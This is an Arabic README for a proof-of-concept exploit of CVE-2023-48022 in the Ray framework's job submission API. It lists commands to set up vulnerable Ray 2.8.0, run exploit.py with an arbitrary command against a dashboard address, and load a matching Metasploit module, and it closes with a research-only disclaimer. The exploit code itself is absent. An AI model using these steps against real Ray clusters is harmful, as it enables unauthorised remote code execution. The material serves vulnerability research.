
ShadowRay RCE POC (CVE-2023-48022)
تمت كتابة سكربت الاستغلال وإثبات المفهوم هذا لإجراء تحليل متعمق لثغرة CVE على vsociety.
إطار Ray، وهو أداة أساسية لتطبيقات الذكاء الاصطناعي والتعلم الآلي القائمة على Python، واجه تحديًا أمنيًا كبيرًا. في جوهره، يُعد Ray بمثابة سكين سويسري للأشخاص الذين يعملون في مشاريع الذكاء الاصطناعي والبيانات الضخمة. تم تحديد هذه الثغرة باسم CVE-2023-48022، وهي تؤثر تحديدًا على واجهة برمجة تطبيقات إرسال المهام (job submission API). يصف الوصف الرسمي هذا الخلل بأنه يسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية، مما يشكل خطرًا كبيرًا على الأنظمة التي تستخدم هذه الإصدارات من Ray. وقد أكد اكتشاف هذه الثغرة على أهمية البروتوكولات الأمنية القوية في الأطر البرمجية، خاصة تلك التي تُعد جزءًا لا يتجزأ من مشاريع الذكاء الاصطناعي والتعلم الآلي التي تعتمد على كميات هائلة من البيانات والطاقة الحاسوبية.
أولاً، ثبّت Ray:
pip3 install -U "ray[default]"==2.8.0
ثم، شغّل Ray:
ray start --head --dashboard-host=0.0.0.0
شغّل سكربت الاستغلال Python:
python3 exploit.py --host http://192.168.150.16:8265 --cmd '<cmd>'
انسخ ملف Ruby إلى المجلد الخاص بوحدات Metasploit:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
شغّل Metasploit باستخدام msfconsole وأعد تحميل الوحدات باستخدام reload_all إذا لم تتمكن من العثور على الوحدة المضافة.
يمكنك تحديدها باستخدام use exploit/multi/misc/ray_job_rce.
عيّن الخيارات اللازمة (RHOST، RPORT، COMMAND، إلخ) وشغّل الاستغلال بالأمر exploit.
تم إنشاء سكربت الاستغلال هذا فقط لأغراض البحث وتطوير تقنيات دفاعية فعّالة. وليس المقصود استخدامه في أي أنشطة خبيثة أو غير مصرح بها. يتنصل مؤلف السكربت ومالكه من أي مسؤولية أو التزام تجاه أي إساءة استخدام أو ضرر ناجم عن هذا البرنامج. لمعلوماتك، يُنصح المستخدمون باستخدام هذا البرنامج بمسؤولية ووفقًا للقوانين واللوائح المعمول بها فقط. استخدمه بمسؤولية.